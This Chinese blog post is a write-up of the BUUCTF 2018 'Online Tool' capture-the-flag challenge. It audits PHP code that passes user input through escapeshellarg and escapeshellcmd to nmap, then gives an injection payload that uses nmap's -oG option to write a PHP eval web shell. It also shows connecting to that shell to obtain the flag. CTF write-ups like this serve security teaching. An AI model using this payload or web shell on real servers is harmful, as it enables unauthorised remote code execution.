[BUUCTF 2018]Online Tool 1

已于 2022-07-20 09:24:42 修改
阅读量780 收藏 3
点赞数
文章标签: php 开发语言
于 2022-07-04 08:16:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43618536/article/details/125585144
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

[BUUCTF 2018]Online Tool 1

题目

BUUCTF的[BUUCTF 2018]Online Tool 1
在这里插入图片描述

一、做题步骤

1.审计代码

代码如下:

<?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

根据最后一行,得知可以利用nmap工具上传$host

-oG xxx.php
nmap上传文件的命令

利用escapeshellarg()+escapeshellcmd()的两次转义,闭合单引号后即可执行任意参数

2.构造payload

?host='<?php eval($_POST[1]);?> -oG shell.php ’

在这里插入图片描述
得到上传路径
bf95f64e6948d09b42c923ac52b1d6df

3.菜刀连接

1.添加信息

http://8a37515d-5eb0-4159-ad15-cc12901145e0.node4.buuoj.cn:81/bf95f64e6948d09b42c923ac52b1d6df/shell.php

2.获取flag

flag{aa1827cb-30c0-4ddb-8df2-dca7633624c8}

在这里插入图片描述

林本
关注
[BUUCTF 2018]Online Tool
bazzza的博客
12-25 268
escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数 escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含 exec(), system() 执行运算符 。 escapeshellcmd — shell 元字符转义 escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任.
BUUCTF 2018 Online Tool
热门推荐
kid的博客
09-10 1万+
BUUCTF 2018 Online Tool 前言 继续刷题,学习,为了成为黑岛的一名工具人而努力! 感谢大佬提供的环境:https://github.com/glzjin/buuctf_2018_online_tool 过程 搭好环境,打开网页,出现一堆代码 OK,首先代码审计…又是php,头大… remote_addr和x_forwarded_for这两个是见的比较多的,服务器获取ip用...
web buuctf [BUUCTF 2018]Online Tool1
weixin_44214568的博客
03-24 2947
考点:escapeshellarg()和escapeshellcmd()漏洞; RCE漏洞 通过代码审计,传参是host,最后的输出对host利用namp扫描, 主要函数就是 $host = escapeshellarg($host); $host = escapeshellcmd($host); escapeshellarg(): escapeshellarg(string$arg):string 重点:escapeshellarg()将给字符串增加一个单引号并且能引用或...
[BUUCTF 2018]Online Tool1
最新发布
m0_73673698的博客
06-08 687
将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。接下来是通过get方法传入host参数,经过escapeshellarg和escapeshellcmd两个函数过滤后,拼接到nmap命令后,通过system系统命令来执行命令。发现在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件这个命令就是我们的输入可控!通过上面的操作逃过了单引号,但escapeshellcmd会对这些特殊符号前面加上\来转义…
BUUCTF 2018 Online Tool(escapeshellarg和escapeshellcmd)
weixin_45577185的博客
07-24 170
答案博客 参考博客 百度来了一篇文章: https://paper.seebug.org/164/ 这两个函数按代码里那样的顺序使用,是会产生漏洞的,如果是反过来就不会。 escapeshellarg: escapeshellarg() 将给字符串增加一个 单引号 并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 命令执行函数,并且还是确保安全的。shell 命令执行函数包含 exec(), system() 执行运算符 (反引号)。 escapeshellcmd: e
[BUUCTF 2018]Online Tool -wp
freerats的博客
07-03 349
打开网页可以看到代码,进行代码审计 $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); echo 'you are in sandbox '.$sandbox; @mkdir($sandbox); chdir($sandbox); 获取你的ip,然后进行加密,把MD5值输出,然后以这个值创建一个目录 尝试一下127.0.0.1 ,发现调用nmap对输入的ip进行扫描 $host = $_GET['host']; $ho.
[BUUCTF 2018]Online Tool(超详细解析payload)
xlcvv的博客
04-15 3964
先吐槽一下,搜到了漏洞也不会利用,会利用了看到这题也不知道getflag,????,砸挖鲁多,食我压路机啊!! 题目给了源码 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET[...
buuctf Online tool
weixin_51313108的博客
08-27 219
考点 escapeshellarg()和escapeshellcmd()过滤函数的绕过 Linuxnamp命令的使用 代码分析 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } 无关紧要的一组代码 if(!isset($_GET['host'])) { highlight_file(__FILE__);
BUUCTF-Online Tool
m0_47571887的博客
11-10 707
这道题真的挺不常见的,考的点也有点不常见 打开题目 一段代码这里就有两个不常见的函数escapeshellarg()和escapeshellcmd(),PHP escapeshellarg()+escapeshellcmd() 之殇 给大家放个链接来理解 大概来说就是这两个函数对我们传入的数值进行单引号转义,会加上/符号,那这时候就只能往后看看能不能利用namp做点文章。 在nmap中有一个参数-oG,就是将命令和结果都写入到文件,到这里我们就可以想到上传一句话,然后写入到php文件里
Office365与SharePoint Online开发指南
1. **Office 365和SharePoint Online简介**:这部分将介绍Office 365平台,它是Microsoft提供的一个集成了多种在线服务(如Exchange Online、Skype for Business和SharePoint Online)的订阅制服务。SharePoint On...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值